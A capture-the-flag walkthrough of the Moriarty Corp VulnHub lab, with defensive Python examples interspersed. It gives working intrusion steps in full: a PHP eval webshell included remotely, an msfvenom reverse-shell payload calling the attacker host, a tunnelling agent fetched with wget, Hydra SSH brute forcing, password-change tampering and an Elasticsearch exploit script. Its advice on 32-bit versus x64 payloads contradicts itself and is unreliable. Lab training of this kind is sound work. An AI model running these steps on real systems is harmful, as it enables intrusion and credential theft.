Table of Contents
1. Environment setup
2. Objective
3. Tool preparation
4. Detailed steps
1. Information collection
1.1 Port scanning (all ports)
1.1.1 Run port detection against the target IP. To avoid missing any ports, use a full port scan.
1.1.2 To guard against missed results, a second full-port scan is run with nmap.
1.2 9000 port exploration
1.3 8000 port exploration
First flag found
2. File inclusion
2.1 Confirm the file inclusion exists
2.2 Write a one-line webshell
Second flag found
3. Reverse shell
3.1 Check the system kernel version
3.2 Building a Linux Trojan
3.3 Upload the Trojan
3.4 Start the msf listener
3.5 Run the Trojan
3.6 Create a session
4. Intranet penetration
4.1 Build a proxy
4.1.1 Start the venom server listener
4.1.2 Start the venom client
4.1.3 Use the socks5 proxy
4.2 Intranet detection
4.2.1 Detecting live web hosts on the intranet
4.3 File upload (172.17.0.4)
4.3.1 Set the browser proxy
4.3.2 Visit the website
4.3.3 Brute force cracking
4.3.4 Connect to the webshell
Third flag found
5. Brute-force SSH login (172.17.0.5)
5.1 Submit flag
5.2 Use an online md5 lookup tool to recover the above hashes
5.3 Scan for intranet hosts with port 22
5.4 Brute force cracking with Hydra
5.5 Remote SSH connection
Fourth flag found
6. Unauthorized access (172.17.0.6)
6.1 Submit flag
6.2 Scan for the intranet host IP of the chat server
6.3 Visit the website
6.4 Change the administrator password
6.5 Log in to the admin user interface
7. Elasticsearch vulnerability (172.17.0.7)
7.1 Submit flag
7.2 Find intranet hosts with port 9200
7.3 Use searchsploit to search for Elasticsearch vulnerability exploit scripts
7.4 Exploiting scripts
Sixth flag found
1. Environment setup
Lab download: BoredHackerBlog: Moriarty Corp ~ VulnHub
Attacker machine: 192.168.118.131 (kali)
Target machine: 192.168.118.129
Resetting the root password on the Ubuntu 18.04 target:
1. Hold Shift while booting and select the second option.
2. Choose the second option again.
3. Select root.
4. Run passwd root to change the password.
2. Objective
Find the six flag values.
3. Tool preparation
Port scanning: masscan, nmap
Webshell tools: Godzilla, AntSword
Packet capture: burpsuite
Proxy: proxychains, venom (https://github.com/Dliv3/Venom/)
4. Detailed steps
1. Information collection
1.1 Port Scan (Full Port)
1.1.1 Run port detection against the target IP. To avoid missing any ports, use a full port scan.
Tool used: masscan
masscan -p 0-65535 192.168.118.129 --rate=1000
1.1.2 To guard against missed results, a second full-port scan is run with nmap.
Tool used: nmap
nmap -sS 192.168.118.129 -p 0-65535
A total of three ports were found – 22 (ssh), 8000 (http), 9000 (cslistener).
1.2 9000 port exploration
http://192.168.118.129:9000/#/auth
Portainer is an open-source Docker container management UI. Its presence suggests the web application is running inside Docker, so a container escape would be needed to reach the host.
I tried the default password admin/admin, but couldn’t log in. The brute force cracking failed, so I looked for other breakthroughs.
1.3 8000 port exploration
http://192.168.118.129:8000/
First flag found
flag{start}
According to the page prompts, access port 80
Visit http://192.168.118.129:8000
The following interface appears; it suggests a file inclusion vulnerability.
2. File inclusion
2.1 Confirm the file inclusion exists
Testing with the following payload confirms that the file inclusion exists:
http://192.168.118.129:8000/?file=/etc/passwd
2.2 Write a one-line webshell
Start a web server in any folder on kali:
python3 -m http.server
In the directory where the web server was started, create bb.txt with the content:
<?php phpinfo(); ?>
Include bb.txt remotely from kali to test whether remote inclusion works.
If the following page appears, remote file inclusion is usable:
Change the content of bb.txt to a one-line webshell:
<?php @eval($_POST['cmd']); ?>
Connect to the webshell management tool, here I use Ant Sword.
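The fix that closes this whole section, as an added Python example (not the page's code and not the target's PHP): a path resolver that rejects every kind of ?file= value used above, a URL (remote inclusion of bb.txt), an absolute path such as /etc/passwd, and ../ traversal. It models in Python the validation a PHP include() handler should apply; PAGE_ROOT is an assumed document root.

```python
import os
from urllib.parse import urlsplit

# Assumed document root for the includable pages (not taken from the page).
PAGE_ROOT = "/var/www/html/pages"


def vulnerable_include_target(file_param):
    """Mirrors include($_GET['file']) with no validation: whatever the client
    sends is the path (or URL) that gets included."""
    return file_param


def safe_include_target(file_param, page_root=PAGE_ROOT):
    """Return the absolute path that may be included, or raise ValueError.

    Checks, in order:
      1. no NUL byte (would truncate the appended extension in older PHP);
      2. no URL scheme, which blocks remote inclusion (http://kali/bb.txt);
      3. a fixed .php extension is appended, so /etc/passwd cannot be read as-is;
      4. the resolved path must stay under page_root, which blocks ../ traversal
         and absolute paths (os.path.join accepts an absolute second argument
         verbatim, so the containment check is what actually stops /etc/passwd).
    """
    if "\x00" in file_param:
        raise ValueError("NUL byte in file parameter")
    if urlsplit(file_param).scheme:
        raise ValueError("remote inclusion rejected")
    root = os.path.realpath(page_root)
    candidate = os.path.realpath(os.path.join(root, file_param + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the page root")
    return candidate


def audit(file_params):
    """Classify a list of ?file= values as 'allowed' or the rejection reason."""
    result = {}
    for p in file_params:
        try:
            safe_include_target(p)
            result[p] = "allowed"
        except ValueError as exc:
            result[p] = str(exc)
    return result


if __name__ == "__main__":
    # The values from this section of the walkthrough plus one legitimate page name.
    for param, verdict in audit([
        "home",
        "/etc/passwd",
        "../../../etc/passwd",
        "http://192.168.118.131:8000/bb.txt",
    ]).items():
        print(f"{param!r}: {verdict}")
```

An allowlist of page names is stricter still and is preferable when the set of includable pages is fixed; the containment check above is the general form that also protects handlers which must accept arbitrary file names under one directory.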
Second flag found
flag{the_game_is_on}
View the file and go to http://192.168.118.129:8000 to submit the flag.
Get the next page. According to the page prompts, there is a database website, intranet IP: 172.17.0.3-254.
3. Reverse shell
3.1 Check the system kernel version
Obtain the system kernel: Linux 4.15, 64-bit. This step matters because it determines how the Trojan is built in the next step.
uname -a
3.2 Building a Linux Trojan
Tool used: msfvenom
Since the target system is a 32-bit Linux system, you must select the Linux/x86 module when selecting the payload. The module that was previously set to x64 cannot be executed on the target machine.
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.118.131 lport=9999 -f elf > cacaca.elf
3.3 Upload Trojan
Upload the Trojan directly through Ant Sword
Add execute permission to the Trojan:
ls -al   # view permissions
chmod 777 cacaca.elf
3.4 Start the msf listener
msfconsole   # start the msf tool
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp   # must be the same payload the Trojan was generated with (stageless, as above)
set lhost 192.168.118.131   # same as in the Trojan
set lport 9999   # same as in the Trojan
run   # start listening
3.5 Run the Trojan
Run cacaca.elf, in Godzilla’s command execution terminal, switch to the location where the Trojan is stored and execute it directly.
./cacaca.elf
3.6 Create session
msf gets a meterpreter (session), but the permissions are very low, just the apache user.
4. Intranet penetration
According to the prompt web page, it indicates that there is an intranet.
4.1 Build a proxy
Tools used: venom
4.1.1 Enable venom server monitoring
Start the venom server and listen for connections on port 3333.
./admin_linux_x64 -lport 3333
4.1.2 Open venom client
Start an http server in the venom directory (it listens on port 8000 by default):
python3 -m http.server
Download the agent_linux_x64 client file onto the target machine from that http server (port 8000, not the venom listener on 3333):
wget http://192.168.118.131:8000/agent_linux_x64
Start the client on the target machine so it connects back to the server; the server then shows a node for the client.
chmod +x ./agent_linux_x64   # add execute permission
./agent_linux_x64 -rhost 192.168.118.131 -rport 3333
4.1.3 Use socks5 proxy
Check the current node number, enter the node, and start socks5:
show
goto 2   # enter the node; the number must match the one shown by show
socks 8376   # socks5 by default
4.2 Intranet Detection
4.2.1 Detecting web hosts that are alive in the intranet
According to the prompt on the flag submission page, there is a database website on the intranet, so the host IP of the surviving web service on the intranet is detected, and the network segment range is 172.17.0.3-254.
Tools used: proxychains
Edit the proxychains configuration file and add the socks5 proxy just created on venom as the last line:
vim /etc/proxychains4.conf
socks5 127.0.0.1 8376
Start detecting intranet surviving hosts
proxychains nmap 172.17.0.3-254 -sV -sT -Pn -T4 -p80
The detection results are as follows. Port 80 of the 172.17.0.4 host is alive.
4.3 File upload (172.17.0.4)
4.3.1 Set browser proxy
Tools used: Firefox plug-in foxyproxy
The browser proxy configuration is as follows:
4.3.2 Visit the website
Access the web website of the intranet host 172.17.0.4 and find the file upload function point but a password is required.
4.3.3 Brute force cracking
Brute-forcing the file upload password
Tool used: burpsuite
1. Set Burp's upstream proxy to the socks5 port 8376 opened on venom, as shown in the figure:
2. Set up Burp's local listener, which captures the browser's requests.
3. Point the browser proxy at Burp's local listener.
4. Capture the upload request and mark the file upload password as the payload position.
5. Set the payload and start the attack.
6. The brute force succeeds; the password is password
4.3.4 Connect to webshell
1. Generate Godzilla Trojan bb.php
2. Change the browser proxy back to socks5 proxy and upload the Trojan file bb.php
3. Directly right-click the bb.php link to obtain the storage path of bb.php on the website.
4. Connect to Godzilla and pay attention to setting the proxy.
The third flag found
flag{picture_is_worth_1000_words}
5. Brute-force SSH login (172.17.0.5)
5.1 Submit flag
Get the hint for the next step:
Several usernames and password hashes for ssh; these are used to continue the attack.
5.2 Use an online md5 lookup tool to recover the above hashes
Online tool: SOMD5 (free online MD5 lookup). Results:
63a9f0ea7bb98050796b649e85481845  root
7b24afc8bc80e548d66c4e7ff72171c5  toor
5f4dcc3b5aa765d61d8327deb882cf99  password
21232f297a57a5a743894a0e4a801fc3  admin
084e0343a0486ff05530df6c705c8bb4  guest
697c6cc76fdbde5baccb7b3400391e30  MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbc  MCORP
35ac704fe1cc7807c914af478f20fd35  mcorp
b27a803ed346fbbf6d2e2eb88df1c51b  weapons
08552d48aa6d6d9c05dd67f1b4ba8747  moriarty
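Why an online lookup recovers these hashes instantly, and what the application should have stored instead, as an added Python example (not from the page): unsalted MD5 is a pure function of the password, so one precomputed table reverses every user's hash at once, whereas a salted, iterated PBKDF2 hash is unique per user and slow per guess. The five hash/plaintext pairs embedded below are copied from the list above (only the pairs the example can verify by itself); the wordlist is constructed.

```python
import hashlib
import hmac
import os

# Hash/plaintext pairs copied from the walkthrough's list above.
PAGE_MD5_HASHES = {
    "63a9f0ea7bb98050796b649e85481845": "root",
    "7b24afc8bc80e548d66c4e7ff72171c5": "toor",
    "5f4dcc3b5aa765d61d8327deb882cf99": "password",
    "21232f297a57a5a743894a0e4a801fc3": "admin",
    "084e0343a0486ff05530df6c705c8bb4": "guest",
}

# Constructed wordlist; an online service uses a precomputed table of billions of entries.
WORDLIST = ["123456", "root", "toor", "password", "admin", "guest", "letmein"]


def md5_dictionary_lookup(hashes, wordlist):
    """Build the MD5 table once and look every hash up in it.
    Returns {hash: plaintext} for each hash that appears in the table."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: table[h] for h in hashes if h in table}


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256. A fresh 16-byte salt per user means two users
    with the same password get different digests and no shared table applies;
    the iteration count makes every guess cost ~200k HMAC computations."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password, salt, digest, iterations=200_000):
    """Constant-time comparison of a recomputed digest against the stored one."""
    _, candidate = hash_password(password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    for h, word in md5_dictionary_lookup(PAGE_MD5_HASHES, WORDLIST).items():
        print(f"{h}  ->  {word}")
    salt, digest = hash_password("weapons")
    print("salted PBKDF2 digest:", digest.hex())
    print("verify 'weapons':", verify_password("weapons", salt, digest))
```

The MD5 lookup finds all five in a seven-word list because the table is independent of the user; the PBKDF2 digest for the same password differs on every run because the salt does, so a leaked hash list yields nothing without per-hash guessing at 200k iterations each.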
5.3 Scan for intranet hosts with port 22
proxychains nmap -p22 -sT -Pn 172.17.0.3-254
5.4 Brute force cracking with Hydra
Store the username and clear text password in user.txt and pass.txt respectively.
proxychains hydra -L user.txt -P pass.txt ssh://172.17.0.5
The result: root / weapons
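What the Hydra run above looks like from the SSH server's side, as an added Python example (not from the page): a detector that counts failed sshd logins per source IP in a sliding window and raises a second, higher-priority alert when a successful login from the same IP follows the burst. The auth.log excerpt is constructed sample data in OpenSSH's syslog format; the host name "db" and source address 172.17.0.3 are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed auth.log excerpt (sample data, not real logs): a short password-guessing
# burst that ends in a successful root login, then one unrelated failed attempt.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 db sshd[1201]: Failed password for root from 172.17.0.3 port 51201 ssh2
Jan 10 12:00:02 db sshd[1202]: Failed password for invalid user admin from 172.17.0.3 port 51202 ssh2
Jan 10 12:00:03 db sshd[1203]: Failed password for root from 172.17.0.3 port 51203 ssh2
Jan 10 12:00:04 db sshd[1204]: Failed password for invalid user guest from 172.17.0.3 port 51204 ssh2
Jan 10 12:00:05 db sshd[1205]: Failed password for root from 172.17.0.3 port 51205 ssh2
Jan 10 12:00:06 db sshd[1206]: Accepted password for root from 172.17.0.3 port 51206 ssh2
Jan 10 12:30:00 db sshd[1300]: Failed password for alice from 10.0.0.9 port 40000 ssh2
Jan 10 12:31:00 db sshd[1301]: Accepted publickey for alice from 10.0.0.9 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_sshd_line(line):
    """Parse one sshd auth line into a dict, or return None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine
    # because only differences between timestamps are used below.
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
    return ev


def detect_ssh_brute_force(log_text, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failed logins per source IP.

    Emits ('brute_force', ip, failures) once when `threshold` failures land inside
    `window`, and ('success_after_brute_force', ip, user) for every later Accepted
    line from that IP, which is the event worth paging on."""
    failures = defaultdict(deque)
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_sshd_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            q = failures[ip]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("brute_force", ip, len(q)))
        elif ip in flagged:
            alerts.append(("success_after_brute_force", ip, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_brute_force(SAMPLE_AUTH_LOG):
        print(alert)
```

The threshold and window are tunable; fail2ban implements the same idea at the host, and the mitigation the hint itself points at is to stop accepting password authentication for root over SSH at all (PasswordAuthentication no, PermitRootLogin prohibit-password in sshd_config).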
5.5 Remote SSH connection
The session runs as root.
Fourth flag found
flag{what_weapons}
6. Unauthorized access (172.17.0.6)
6.1 Submit flag
Get a tip: There is another website, the port is not 80, but one of 443, 8000, 8080, 8888.
Username: buyer13
Password: arms13
6.2 Scan the intranet host IP of the chat server
proxychains nmap -p443,8080,8000,8888 -sT -Pn 172.17.0.3-254
The result is as follows: 172.17.0.6:8000
6.3 Visit the website
Enter the username and password obtained previously:
Username: buyer13
Password: arms13
Click chats and find the administrator username: admin.
6.4 Change administrator password
Click change password to enter the password change interface.
1. Capture the request with Burp.
2. Modify the request so that the admin account's password is changed to 123456.
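The flaw exploited in this step is a password-change handler that trusts the account name carried in the request instead of the server-side session. As an added Python example (not the chat application's code, whose internals the page does not show), here is the vulnerable handler beside a corrected one that binds the change to the session identity and re-authenticates with the current password. The in-memory user table and the admin's starting password are constructed; buyer13/arms13 are the credentials from the walkthrough.

```python
import hashlib
import hmac
import os


def _pw_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def make_user_store():
    """Constructed in-memory user table standing in for the chat app's database.
    The admin's real password is unknown; the value here is a placeholder."""
    users = {}
    for name, role, pw in [("admin", "admin", "placeholder-admin-password"),
                           ("buyer13", "buyer", "arms13")]:
        salt = os.urandom(16)
        users[name] = {"role": role, "salt": salt, "hash": _pw_hash(pw, salt)}
    return users


def check_password(users, name, password):
    u = users.get(name)
    return u is not None and hmac.compare_digest(_pw_hash(password, u["salt"]), u["hash"])


def _store(users, name, new_password):
    salt = os.urandom(16)
    users[name]["salt"], users[name]["hash"] = salt, _pw_hash(new_password, salt)


def change_password_vulnerable(users, session_user, request):
    """Uses the 'username' field from the request body to decide whose password
    changes. The session user is ignored, so a logged-in buyer who edits the
    intercepted request to name 'admin' resets the administrator's password."""
    _store(users, request["username"], request["new_password"])
    return "ok"


def change_password_safe(users, session_user, request):
    """Target defaults to the authenticated session user; acting on another
    account requires the admin role, and every change requires the caller's
    current password so a hijacked session alone is not enough."""
    target = request.get("username", session_user)
    if target != session_user and users[session_user]["role"] != "admin":
        raise PermissionError("cannot change another user's password")
    if not check_password(users, session_user, request["current_password"]):
        raise PermissionError("current password incorrect")
    _store(users, target, request["new_password"])
    return "ok"


def try_change(handler, users, session_user, request):
    """Run a handler and report 'ok' or the PermissionError message."""
    try:
        return handler(users, session_user, request)
    except PermissionError as exc:
        return str(exc)


if __name__ == "__main__":
    tampered = {"username": "admin", "current_password": "arms13", "new_password": "123456"}
    users = make_user_store()
    print("vulnerable:", try_change(change_password_vulnerable, users, "buyer13", tampered),
          "admin now 123456:", check_password(users, "admin", "123456"))
    users = make_user_store()
    print("safe:", try_change(change_password_safe, users, "buyer13", tampered),
          "admin now 123456:", check_password(users, "admin", "123456"))
```

The same pattern (identity from the session, authorization against the target, re-authentication for sensitive changes) applies to any account-management endpoint; the request body should never be the source of truth for who is acting.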
6.5 Log in to the admin user interface
Note: If the buyer user cannot log out in Kali, change the browser.
The local browser is used here, and the proxy settings are as follows:
Log in as admin user
Find the fifth flag
flag{on_the_move}
7. Elasticsearch vulnerability (172.17.0.7)
7.1 Submit flag
According to the hint, there is a back-end database and it uses Elasticsearch. Elasticsearch is an open-source, highly scalable distributed full-text search engine that listens on port 9200 by default.
7.2 Find intranet hosts with port 9200
proxychains nmap 172.17.0.3-254 -sV -sT -Pn -T4 -p9200
7.3 Use searchsploit to search for Elasticsearch vulnerability exploit scripts
searchsploit -t Elasticsearch
searchsploit -x linux/remote/36337.py
cp /usr/share/exploitdb/exploits/linux/remote/36337.py ./
7.4 Exploiting Scripts
proxychains curl -XPOST '172.17.0.7:9200/twitter/user/yren' -d '{"name":"ss"}'
proxychains python2 36337.py 172.17.0.7
Get the sixth flag
flag{game_over}
Submit the flag and end.